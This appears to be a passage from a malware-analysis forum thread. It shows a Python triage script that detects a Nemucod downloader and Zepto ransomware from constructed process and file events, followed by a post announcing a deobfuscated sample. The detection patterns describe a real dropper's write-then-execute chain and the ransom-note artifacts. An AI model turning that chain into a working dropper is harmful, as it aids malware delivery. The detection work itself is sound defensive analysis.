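# Constructed events modelled on the thread's observations.
CONSTRUCTED_EVENTS = [
    {"type": "file_write", "process": "wscript.exe",
     "path": r"C:\Users\DardiM\AppData\Local\Temp\uosoT7UCkbfcrM"},
    {"type": "process_create", "process": "wscript.exe",
     "path": r"C:\Users\DardiM\AppData\Local\Temp\uosoT7UCkbfcrM.exe", "args": "321"},
    {"type": "file_create", "process": "uosoT7UCkbfcrM.exe",
     "path": r"C:\120 Wallpapers HD\5FC4B320-69D3-B282-97E0-DE77CFB27811.zepto"},
    {"type": "file_create", "process": "uosoT7UCkbfcrM.exe",
     "path": r"C:\120 Wallpapers HD\_2_HELP_instructions.html"},
    {"type": "file_create", "process": "explorer.exe",
     "path": r"C:\Users\DardiM\Documents\report.docx"},
]

# Last path component directly under a user's %TEMP% directory.
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\([^\\]+)$", re.IGNORECASE)


def downloader_stage(events):
    """wscript.exe writes %TEMP%\\<name>, then launches %TEMP%\\<name>.exe.

    Returns (image path, arguments) for every such launch, in order.
    """
    written = set()
    hits = []
    for ev in events:
        if ev["process"].lower() != "wscript.exe":
            continue
        m = TEMP_RE.search(ev["path"])
        if not m:
            continue
        name = m.group(1).lower()
        if ev["type"] == "file_write":
            written.add(name)
        elif ev["type"] == "process_create" and name.endswith(".exe"):
            if name[:-4] in written:
                hits.append((ev["path"], ev.get("args", "")))
    return hits


def ransomware_stage(events):
    """Folders that received both a .zepto file and a _HELP_instructions.html."""
    per_folder = defaultdict(set)
    for ev in events:
        if ev["type"] not in ("file_create", "file_write"):
            continue
        folder, _, name = ev["path"].rpartition("\\")
        low = name.lower()
        if low.endswith(".zepto"):
            per_folder[folder].add("zepto")
        elif low.endswith("_help_instructions.html"):
            per_folder[folder].add("note")
    return sorted(f for f, seen in per_folder.items() if seen == {"zepto", "note"})


def triage(events):
    """Run both checks and return their findings together."""
    return {"downloader": downloader_stage(events),
            "ransomware": ransomware_stage(events)}


if __name__ == "__main__":
    for stage, findings in triage(CONSTRUCTED_EVENTS).items():
        print(stage, findings)
```

The downloader check deliberately keys on the write-then-execute pairing under %TEMP% rather than on the random file name, since the name changes per sample; the payload check requires both the encrypted file and the note in the same folder so that an ordinary .html write on its own does not fire.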

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
JS/TrojanDownloader.Nemucod.AJP:

Deobfuscated file attached.
=> some typing and naming errors (functions) corrected.

FOR INFORMATION PURPOSES ONLY
 

Attachments: deobfuscated.pdf (172.7 KB)
